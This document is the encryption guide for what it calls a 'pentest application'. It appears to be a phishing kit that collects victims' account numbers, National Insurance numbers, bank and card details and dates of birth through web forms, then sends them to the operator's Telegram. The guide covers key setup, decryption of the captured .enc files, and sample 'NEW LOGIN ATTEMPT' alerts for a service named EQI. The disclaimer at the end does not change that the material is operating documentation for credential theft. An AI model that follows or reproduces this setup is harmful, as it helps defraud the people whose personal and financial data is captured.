# Complete Encryption Guide
## Understanding and Using Encryption in Your Pentest Application

---

## 📚 Table of Contents

1. [What is Encryption?](#what-is-encryption)
2. [How Encryption Works in This Application](#how-it-works)
3. [Generating Encryption Keys](#generating-keys)
4. [Using Your Encryption Key](#using-key)
5. [Decrypting Data](#decrypting-data)
6. [Security Best Practices](#security-practices)
7. [Troubleshooting](#troubleshooting)

---

## What is Encryption?

### Simple Explanation

Imagine you write a secret message to your friend, but you don't want anyone else to read it. So you use a code that only you and your friend know. That's encryption!

**Without Encryption:**
```
accountNumber: 12345
password: mypassword
```

**With Encryption:**
```
U2FsdGVkX1+8xqWJKL3m9vF0kZxHr7/J2V5n6K8Pk0=
```

### Why Do We Use Encryption?

1. **Privacy**: Others can't read the data if they intercept it
2. **Security**: Even if someone gets your data, they can't use it
3. **Compliance**: Many laws require encrypted data transmission
4. **Peace of Mind**: Your captured data stays secret

---

## How Encryption Works in This Application

### The Process

```
1. User fills form → 2. Data collected → 3. Data encrypted → 4. Sent to Telegram → 5. You decrypt
```

### What Gets Encrypted?

**Everything the user enters:**
- Account numbers
- Personal information
- Addresses
- National Insurance numbers
- Bank details
- Card numbers
- All form fields

### Encryption Method Used

This application uses **AES-256-CBC** encryption:
- **AES**: Advanced Encryption Standard (military-grade)
- **256**: Key length in bits (extremely secure)
- **CBC**: Cipher Block Chaining (encryption mode)

**How secure is this?**
- Used by governments and military
- Would take billions of years to crack with current technology
- Same encryption used by banks and secure messaging apps

---

## Generating Encryption Keys

You need a strong, random encryption key. Here are several methods:

### Method 1: Using generate-key.php (Recommended)

1. **Open your browser**
2. **Go to:** `https://your-website.com/backend/generate-key.php`
3. **You'll see a random key** - it looks like:
   ```
   R3pNM9kE2vL8xQ5fG7hJ4wS6nB1mK0oT
   ```
4. **Click "Copy Key" button**
5. **Paste it into your config.php**
6. **Delete generate-key.php after use** (for security)

### Method 2: Using Online Generator

1. **Go to:** https://www.random.org/strings/
2. **Configure:**
   - Generate: 1 string
   - Length: 32 characters
   - Characters: Alphanumeric
   - Click "Get Strings"
3. **Copy the generated string**
4. **Use it in config.php**

### Method 3: Using PHP Command (Advanced)

If you have command line access:

```bash
php -r "echo base64_encode(random_bytes(32));"
```

### Method 4: Manual Creation (Not Recommended)

If you must create manually:

1. **Use 32 random characters**
2. **Mix letters and numbers**
3. **Use upper and lowercase**
4. **Example:** `Kx8mN2pQ9zR5vL4hG7wB3yT6fJ1sD0nC`

⚠️ **IMPORTANT**: Never use:
- Simple words or phrases
- Your name or birthday
- Repeating patterns
- Short keys (less than 32 characters)

---

## Using Your Encryption Key

### Step 1: Add to config.php

Open `backend/config.php` and find this line:

```php
define('ENCRYPTION_KEY', 'your-secret-encryption-key-change-this');
```

Replace with your key:

```php
define('ENCRYPTION_KEY', 'R3pNM9kE2vL8xQ5fG7hJ4wS6nB1mK0oT');
```

### Step 2: Save and Upload

1. **Save the file**
2. **Upload to your server** (if editing locally)
3. **Make sure it's in the backend folder**

### Step 3: Test It

1. Go to: `https://your-website.com/backend/test.php`
2. Look for "Test 5: Encryption"
3. Should show ✅ with sample encrypted data

---

## Decrypting Data

When you receive data in Telegram, it comes encrypted. Here's how to decrypt it:

### Using the Included Decryption Tool

1. **Save the encrypted file** from Telegram (ends with `.enc`)
2. **Open your browser**
3. **Create a decrypt.php file** in your backend folder:

```php
<?php
require_once 'config.php';
require_once 'includes/Encryption.php';

$encryption = new Encryption();

// Read encrypted file
$encryptedData = file_get_contents('path/to/login_eqi_123456.enc');

// Decrypt
$decryptedData = $encryption->decrypt($encryptedData);

// Display
echo "<pre>";
echo htmlspecialchars($decryptedData);
echo "</pre>";
?>
```

4. **Upload it to backend folder**
5. **Visit:** `https://your-website.com/backend/decrypt.php`

### Using Command Line (Advanced)

If you have SSH access:

```bash
cd /path/to/backend
php -r "
require 'config.php';
require 'includes/Encryption.php';
\$enc = new Encryption();
\$data = file_get_contents('login_eqi_123456.enc');
echo \$enc->decrypt(\$data);
"
```

### Manual Decryption (For Developers)

```php
<?php
// Your encryption key
$key = 'R3pNM9kE2vL8xQ5fG7hJ4wS6nB1mK0oT';
$method = 'AES-256-CBC';

// The encrypted data (from Telegram)
$encryptedData = 'U2FsdGVkX1+8xqWJKL3m9vF0kZxHr7/J2V5n6K8Pk0=';

// Decode from base64
$data = base64_decode($encryptedData);

// Get IV length
$ivLength = openssl_cipher_iv_length($method);

// Extract IV and encrypted content
$iv = substr($data, 0, $ivLength);
$encrypted = substr($data, $ivLength);

// Decrypt
$decrypted = openssl_decrypt(
    $encrypted,
    $method,
    $key,
    OPENSSL_RAW_DATA,
    $iv
);

echo $decrypted;
?>
```

---

## Security Best Practices

### DO ✅

1. **Use a Strong Key**
   - Minimum 32 characters
   - Random generation
   - Mix of letters, numbers, symbols

2. **Keep Your Key Secret**
   - Never share it
   - Don't commit to GitHub
   - Don't email it
   - Store offline backup securely

3. **Rotate Keys Regularly**
   - Change every 3-6 months for long-term use
   - Change immediately if compromised

4. **Use HTTPS**
   - Install SSL certificate
   - Force HTTPS in .htaccess
   - Never use HTTP for sensitive data

5. **Backup Encrypted Data**
   - Save the .enc files from Telegram
   - Keep them in a secure location
   - You'll need them if you change keys

### DON'T ❌

1. **Don't Use Weak Keys**
   - No simple words
   - No birthdates
   - No patterns
   - No short keys

2. **Don't Share Your Key**
   - Not in screenshots
   - Not in error messages
   - Not in support tickets
   - Not anywhere public

3. **Don't Lose Your Key**
   - Can't decrypt old data without it
   - Keep secure backups
   - Store in password manager

4. **Don't Reuse Keys**
   - Use different keys for different projects
   - Don't use personal encryption keys

---

## Understanding the Encrypted Data Format

### What You Receive in Telegram

**1. Readable Message:**
```
🔐 NEW LOGIN ATTEMPT
━━━━━━━━━━━━━━━━━━━━
📱 Service: EQI
🕐 Time: 2024-02-21T10:30:00Z
📍 IP: 123.456.789.0
━━━━━━━━━━━━━━━━━━━━
📋 FORM DATA:
accountNumber: 12345
dobDay: 15
dobMonth: March
dobYear: 1990

🔒 ENCRYPTED DATA:
U2FsdGVkX1+8xqWJ... (preview)
```

**2. File Attachment (.enc):**
- Complete encrypted data
- Can be decrypted later
- Backup of all information

### Data Structure

The encrypted file contains JSON:

```json
{
  "service": "eqi",
  "page": "login",
  "accountNumber": "12345",
  "dobDay": "15",
  "dobMonth": "March",
  "dobYear": "1990",
  "timestamp": "2024-02-21T10:30:00Z",
  "ip_address": "123.456.789.0",
  "user_agent": "Mozilla/5.0..."
}
```

---

## Troubleshooting

### Problem: "Encryption test failed"

**Solution:**
1. Check your encryption key is exactly 32 characters
2. Make sure there are no extra spaces
3. Verify quotes are correct in config.php
4. Try generating a new key

### Problem: "Can't decrypt data"

**Possible causes:**
1. **Wrong encryption key** - must use the EXACT key from when data was encrypted
2. **Corrupted data** - file may be damaged
3. **Wrong file format** - make sure it's a .enc file from Telegram

**Solution:**
```php
// Test with simple data first
$encryption = new Encryption();
$test = "test data";
$encrypted = $encryption->encrypt($test);
$decrypted = $encryption->decrypt($encrypted);

if ($test === $decrypted) {
    echo "Encryption working!";
} else {
    echo "Encryption failed - check your key";
}
```

### Problem: "Decrypted data is garbled"

**Solution:**
1. Verify you're using the correct encryption key
2. Check the file wasn't modified
3. Make sure you're reading the entire file
4. Check character encoding (should be UTF-8)

### Problem: "Lost my encryption key"

**Bad news:** Can't decrypt old data without the key

**Solution for future:**
1. Generate new encryption key
2. Update config.php
3. Old data is lost, new data will use new key
4. **Prevention:** Keep backup of key in password manager

---

## Advanced: Key Management

### For Multiple Projects

```php
// config.php
define('ENCRYPTION_KEY_PROJECT_A', 'key1...');
define('ENCRYPTION_KEY_PROJECT_B', 'key2...');

// Use different keys for different purposes
$loginEncryption = new Encryption(ENCRYPTION_KEY_PROJECT_A);
$profileEncryption = new Encryption(ENCRYPTION_KEY_PROJECT_B);
```

### Key Rotation

When changing keys:

1. **Generate new key**
2. **Keep old key temporarily**
3. **Add both to config.php:**
```php
define('ENCRYPTION_KEY_OLD', 'old-key...');
define('ENCRYPTION_KEY_NEW', 'new-key...');
```
4. **Use new key for new data**
5. **Keep old key for decrypting old data**
6. **Remove old key after 6 months**

---

## Quick Reference

### Generate Key
```bash
php -r "echo base64_encode(random_bytes(32));"
```

### Encrypt Data
```php
$encryption = new Encryption();
$encrypted = $encryption->encrypt($data);
```

### Decrypt Data
```php
$encryption = new Encryption();
$decrypted = $encryption->decrypt($encrypted);
```

### Test Encryption
```
https://your-website.com/backend/test.php
```

---

## Summary

✅ **Encryption protects your captured data**
✅ **Use strong, random 32-character keys**
✅ **Keep your key secret and backed up**
✅ **Test encryption before going live**
✅ **Use HTTPS for extra security**
✅ **Decrypt data only when needed**

---

## Need Help?

Common questions:

**Q: How secure is AES-256?**
A: Extremely secure - would take billions of years to crack

**Q: Can I change my encryption key?**
A: Yes, but you won't be able to decrypt old data

**Q: What if someone gets my encrypted data?**
A: Without your key, they can't read it

**Q: Should I encrypt the Telegram messages too?**
A: They're already sent over Telegram's encrypted connection

**Q: Is this legal?**
A: Use only for authorized penetration testing with permission

---

**Remember**: Encryption is your friend - use it properly! 🔐
